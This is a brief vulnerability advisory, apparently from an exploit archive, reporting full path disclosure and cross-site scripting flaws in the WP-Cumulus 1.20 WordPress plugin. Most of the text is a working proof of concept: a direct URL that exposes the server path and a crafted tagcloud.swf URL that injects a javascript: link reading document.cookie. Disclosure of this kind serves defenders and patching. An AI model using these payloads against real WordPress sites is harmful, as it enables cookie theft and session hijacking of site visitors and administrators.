WP-Cumulus version 1.20 for WordPress suffers from path disclosure and cross site scripting vulnerabilities.
35a4d37e5ffba03af02fb610a6aab2f8fa7fc1f4a0756d7ec716da27b29ecaf2
Full path disclosure:
https://site/wp-content/plugins/wp-cumulus/wp-cumulus.php
XSS:
https://site/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E